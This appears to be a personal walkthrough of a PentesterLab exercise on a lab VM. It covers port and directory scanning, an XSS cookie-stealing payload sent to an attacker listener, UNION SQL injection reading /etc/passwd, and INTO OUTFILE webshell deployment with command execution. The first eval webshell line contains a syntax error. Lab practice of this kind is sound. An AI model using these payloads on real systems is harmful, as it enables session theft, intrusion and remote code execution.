Pentesterlab--Xss and MySQL FILE

It is time for you to act, LORD; your law is being broken. — Psalm 119:126

This course details the exploitation of a Cross-Site Scripting in a PHP based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker will be able to gain code execution on the server using SQL injections.

From Pentesterlab:

The attack is divided into 2 steps:

Detection and exploitation of Cross-Site Scripting vulnerabilities: in this part, you will learn how to detect and exploit Cross-Site Scripting vulnerabilities.
Access to the administration pages, then find and exploit a SQL injection to gain code execution. The last step in which you will access the operating system and run command.

Difficluty: 2/5

Forces:

Nmap
wfuzz
Zap
Firebug
Cookie Manager+

Detail Assessment and Planning

Port scan to identify opened ports, running services and services version. —Nmap
Burte force hidden path of the server. —-wfuzz
Indetify XSS vuln and scan the website pages. —-Zap
Embeded script into page. —- Firebug
Deploy web shell.

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

nmap -sV -v -A 192.168.79.168

[title manually exploit [alt text]]

Use wfuzz to burte force hidden path of the server

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.168/FUZZ 2>/dev/null

[title manually exploit [alt text]]

Also I lauched zap to scan the website, try to find interesting things such as injection points and hidden pages. two things are very interesting. First of all, zap raises a flag for a xss vulnerability:

[title manually exploit [alt text]]

it looks like zap has already inject <script>alert(1);</script> into that page. If you visit the link “http://192.168.79.168/post.php?id=1”, it will pop up an alert 1.

[title manually exploit [alt text]]

We can use this xss vulnerability to steal admin’s cookie.

keep going …

Before stealing admin’s cookie, we have to setup listener on attacking machine,

python -m SimpleHTTPServer 4444

use this payload instead of alert(1) in the xss (use firebug to edit the html)

<script>document.write('<img src="http://192.168.79.156:4444/?'+document.cookie+' "/>');</script>

192.168.79.156 is attacker’s machine.

Now we got the cookie.

[title manually exploit [alt text]]

put the cookie in Cookie Manager+

[title manually exploit [alt text]]

now visit http://192.168.79.168/admin/

[title manually exploit [alt text]]

Let’s explore the admin’s pages. First, click edit, it will go to http://192.168.79.168/admin/edit.php?id=2

[title manually exploit [alt text]]

now looks like the url contains injection point, lets try to use single quote:

http://192.168.79.168/admin/edit.php?id=2'

we get error message:

[title manually exploit [alt text]]

Now we know that the web sites' absolute path is “/var/www/”

From pentesterlab

Exploiting SQL injection using UNION follows the steps below:

1 Find the number of columns to perform the UNION 2 Find what columns are echoed in the page 3 Retrieve information from the database meta-tables 4 Retrieve information from other tables/databases

In order to perform a request by SQL injection, you need to find the number of columns that are returned by the first part of the query. Unless you have the source code of the application, you will have to guess this number.

There are two methods to get this information:

1 using UNION SELECT and increase the number of columns; 2 using ORDER BY statement.

Here we use order by statement to get the number of columns

http://192.168.79.168/admin/edit.php?id=2 order by 4 -- good http://192.168.79.168/admin/edit.php?id=2 order by 5 -- error

Now that we know the number of columns, we can retrieve information from the database. Based on the error message we received, we know that the backend database used is MySQL.

get DB version:

http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,@@version,4

[title manually exploit [alt text]]

get /etc/passwd file:

http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,load_file("/etc/passwd"),4

[title manually exploit [alt text]]

get user info:

http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,user(),4

[title manually exploit [alt text]]

since the user is root, now we can deploy a webshell…

use http://192.168.79.168/admin/edit.php?id=0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" to create evil.php under css folder. Encode http://192.168.79.168/admin/edit.php?id=0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" part.

Now we can see that the evil.php is created successfully.

[title manually exploit [alt text]]

Cool… Lets write webshell now

http://192.168.79.168/admin/edit.php?id=0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"

of course. encode 0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"

Now run command:

http://192.168.79.168/css/webshell.php?c=cat /etc/passwd

encode /etc/passwd

[title manually exploit [alt text]]

Bob1Bob2

Pen Test Notes